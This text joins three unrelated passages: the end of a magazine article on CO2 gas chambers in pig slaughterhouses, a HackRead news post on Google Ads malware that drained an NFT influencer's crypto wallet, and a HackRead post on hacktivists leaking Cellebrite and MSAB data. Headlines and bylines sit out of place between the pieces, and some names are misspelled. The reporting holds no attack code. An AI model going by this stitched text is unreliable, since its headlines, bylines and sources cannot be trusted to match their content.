“Those animals suffered terribly. They suffered horribly,” says Jim Reynolds, a vet and professor at Western University’s College of Veterinary Medicine who has served on the American Veterinary Medicine Association’s panel for euthanasia guidelines. “It was absolutely a violation of federal law. They were not stunned. It was inhumane.”

Reynolds says he watched at least 10 of DxE’s clips from its investigation, and they left him disturbed for days. “I’ve actually seen a lot of horrible videos. This is the worst I’ve ever seen,” he says. “I’m not eating pork from the United States anymore until somebody fixes these problems.”

The Humane Methods of Slaughter Act states that any technique for stunning animals that’s “rapid and effective” is legal, says Justin Marceau, a professor focused on animal law at the University of Denver’s Sturm School of Law. But “it is difficult to believe that anyone could watch these videos and conclude that the method being used is either rapid or effective,” says Marceau, who watched clips of DxE’s footage. “You need to have methods that are reliable and rapid, and that is not what I see in these videos.”

The veterinarians’ letter to the AVMA that was sent to coincide with the release of DxE’s footage echoes this view, arguing that the “extreme distress experienced by the pigs highlights the company’s failure to comply with the Humane Slaughter Act and California law.”

The US Department of Agriculture, which regulates the meatpacking industry in the country, didn’t respond to WIRED’s request for comment about the legality of Smithfield Foods’ use of CO2 stunning chambers in its slaughterhouses.

Veterinarians disagree on what exactly to _do_ about gas chambers. Most agree that compared with electrocution, which has to be performed on pigs one at a time, gas chambers are actually preferable in that they allow pigs to stay in groups, which reduces their stress. But the gas chambers also obscure what happens to the pigs after the chamber closes—including suffering that lasts far longer than electrocution. Temple Grandin, a renowned animal welfare expert and professor of animal science at Colorado State University, writes that “if the pigs violently attempt to escape when they first inhale the gas, this is not acceptable.”

Some prominent researchers, like Cambridge University neuroscientist and animal welfare expert Donald Broom, have argued that argon gas puts pigs to sleep without the same degree of suffering as CO2. But Grandin counters that using argon is more expensive and so unlikely to be adopted by the pork industry. Instead, she suggests pigs could be genetically bred to have a less violent reaction to CO2. She says she’s seen firsthand that some breeds of pigs die without showing signs of struggle inside CO2 gas chambers.

Three years ago, Grandin says, she and one of her students had planned to carry out a study in one meatpacking plant, owned by a major pig-rearing and slaughterhouse company, to put cameras inside a CO2 gas chamber and observe its effects on different breeds of pigs. Just days before the study was set to begin, according to Grandin, the company canceled the project. “I was furious,” she says.

“I wanted to try to fix this problem,” Grandin adds. “They didn’t want to look inside the box.”

DxE’s Deerbrook says the first step toward any solution is for meatpacking plants and the USDA to use their own cameras to monitor what happens to animals inside slaughterhouse gas chambers. (She says she saw none during her climb into Farmer John’s pit.) She doesn’t want to prescribe a fix or tweak for those machines but rather to expose the cruelty they hide—and expose regulators’ unwillingness to enforce the animal welfare laws she says they violate.

“We’re saying, ‘You’re not looking in here because you _know_ this is inhumane,’” says Deerbrook. “You need to witness what you’re doing. You need to look inside.”

Spy Cams Reveal the Grim Reality of Slaughterhouse Gas Chambers

By Habiba Rashid
NFT influencer @NFT_GOD downloaded malware through Google Ads while attempting to download OBS, an open-source video streaming software.
This is a post from HackRead.com Read the original post: Google Ads Malware Wipes NFT Influencer’s Crypto Wallet

Blockchain data confirms that the NFT influencer lost at least 19 Ether, worth nearly $27,000 at the time, a Mutant Ape Yacht Club (MAYC) NFT with a current floor price of 16 ETH ($25,000), and multiple other NFTs.

An NFT influencer with the Twitter handle @NFT\_GOD claims to have lost thousands of dollars worth of non-fungible tokens (NFTs) and crypto in a Google Ads-delivered malware attack.

On 14th January, NFT God, also known as Alex, shared on Twitter how his “entire livelihood was violated.” In the thread, he explained how his online accounts, including Twitter, Substack, Gmail, and Discord, were hacked into and his crypto wallet compromised after he accidentally downloaded **malicious software from Google Ad**. 

This should not come as a surprise since malicious hackers have a history of exploiting Google Ads to spread malware through the Google search engine. **In February 2018**, hackers managed to steal over $50 million in Bitcoin after using Google Ads to buy the top result slot on the Google search engine.

**More Google Ads and Malware News**

1.  Royal Ransomware Uses Google Ads and Cracked Software
2.  Nitrokod Crypto Miner Hiding in Fake Google Translate Apps
3.  Google AdSense Abused to Drop Malware on Android Devices
4.  Fake Brave browser site dropped malware, thanks to Google Ads
5.  Google Drive accounted for 50% of malicious Office docs downloads

The pseudonymous influencer has more than 80,000 followers on Twitter and thousands of followers and subscribers on Substack.

Alex said he used the Google search engine to download OBS, an open-source video streaming software. But instead of downloading the software by clicking on the official website, he used the sponsored ad for what he believed was the same thing. 

After being informed of the series of phishing tweets posted from his two Twitter accounts, Alex realized that he had downloaded malware with the software he had installed.

Blockchain data **confirms** that he lost at least 19 Ether, worth nearly $27,000 at the time, a Mutant Ape Yacht Club (MAYC) NFT with a current floor price of 16 ETH ($25,000), and multiple other NFTs.

On the other hand, the attacker moved most of the ETH through multiple wallets before sending it to the decentralized exchange (DEX) FixedFloat, where it was swapped for unknown cryptocurrencies.

Alex believes that the hackers were able to gain access to his **crypto and NFTs** because of a “critical mistake” where he set up his hardware wallet as a hot wallet by entering its seed phrase “in a way that no longer kept it cold,” or offline.

Alongside his crypto wallet, the hackers also breached his Substack account and sent phishing emails to the 16,000 subscribers on his account, compromising the trust he had built with his community. At the same time, Google’s lack of security and scrutiny is also questionable.

1.  Ad-blocker extension injected ads in Google searches
2.  This malware replaces address to steal cryptocurrency
3.  Fake Windows 11 Downloads Distributing Vidar Malware
4.  Fake TeamViewer download ads spread ZLoader variant
5.  Facebook ads dropped malware posing as Clubhouse app

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Google Ads Malware Wipes NFT Influencer’s Crypto Wallet

By Waqas
The data is now available for download on DDoSecrets and the official website Enlace Hacktivista.
This is a post from HackRead.com Read the original post: Hacktivists Leak 1.7TB of Cellebrite, 103GB of MSAB Data

According to the Enlace Hacktivista group, the Cellebrite and MSAB data (both are smartphone forensic firms) was provided to them by an “anonymous whistleblower.”

The Israeli mobile forensics firm, **Cellebrite**, has apparently suffered yet another data breach in which hackers managed to steal 1.7 TB of data. The hackers are also claiming to have stolen 103 GB of data from MSAB, a Sweden-based forensics firm.

In both cases, the trove of information is available for download on DDoSecrets and the official website **Enlace Hacktivista**. It is worth noting that, according to Enlace Hacktivista, the Cellebrite and MSAB data was provided to them by an “anonymous whistleblower.”

**Cellebrite Data Leak Details**

The Petah Tikva, Israel-based Cellebrite is **frequently criticized** for aiding governments with its tools and spyware to monitor the activities of human rights activists, officials, dissidents, and journalists.

Cellebrite UFED (Universal Forensics Extraction Device) is among its most famous services availed by intelligence agencies and law enforcement authorities globally to access data from mobile devices seized during investigations.

This time, however, the company has become a target of the data breach. The data was later posted online by Enlace Hacktivista and DDoSecrets. Further analysis revealed that 103 GB of data from MSAB, a Sweden-based forensics firm, was also leaked. The firm is **criticised for** providing services to repressive regimes including Myanmar’s security forces.

Both databases are currently being offered for downloading through torrents and direct downloads from **DDoSecrets** and **Enlance Hacktivista**.

Here, it is worth mentioning that Cellebrite is known for breaking into passcode-secured smartphones, including Android and iOS devices, and extracting their data. In fact, **in 2019, the company claimed** its new tool could unlock “almost any iOS and Android device.

Reportedly, Cellebrite also played a major role in unlocking the iPhone device of San Bernardino back in 2016. Nevertheless, the apparent hack should not come as surprise since Cellebrite has a history of data breaches.

**Previous Cellebrite Data Breaches**

1.  Cellebrite Hacked; 900 GB data stolen
2.  Anonymous Source Leaks 4TB of Cellebrite Data
3.  Signal CEO hacks Cellebrite cellphone hacking tool
4.  iPhone hacking tool Cellebrite is being sold on eBay
5.  Hacker Dumps Hacking Tools Stolen from Cellebrite

**Who Stole the Data?**

Enlance Hactivista’s homepage revealed that they received the data from an anonymous whistleblower. They received it on January 13th, 2023. However, DDoSecrets and Enlance Hacktivista hadn’t made any claims about the source of data, its validity, and the sender’s identity.

**What Data is Leaked?**

An analysis of the 1.7TB archive indicated that it contained the full suite of Cellebrite programs. This includes its flagship software UFED, the Physical Analyser, Physical Analyser Ultra, license tools, and the Cellebrite Reader.

Moreover, there were technical guides and files used to localize the software. Customer documents were also part of the archive, dated from November 19th to December 3rd, 2022.

It is reported that sensitive data wasn’t leaked, and Cellebrite’s systems or customer information wasn’t impacted. Most of the leaked files are world maps and translation packs.

1.  Clearview AI firm with photos of billions of HACKED
2.  US govt gets its hand on $15,000 iPhone cracking device
3.  Textalyzer Tells Police Everything Users Do on Smartphone
4.  Securus firm that lets US Cops track cellphone users is hacked
5.  Leaked info confirms in-house hacking capabilities of Cellebrite

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#android